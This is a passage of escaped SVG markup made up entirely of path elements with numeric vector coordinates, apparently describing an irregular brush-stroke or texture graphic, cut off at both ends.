d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path 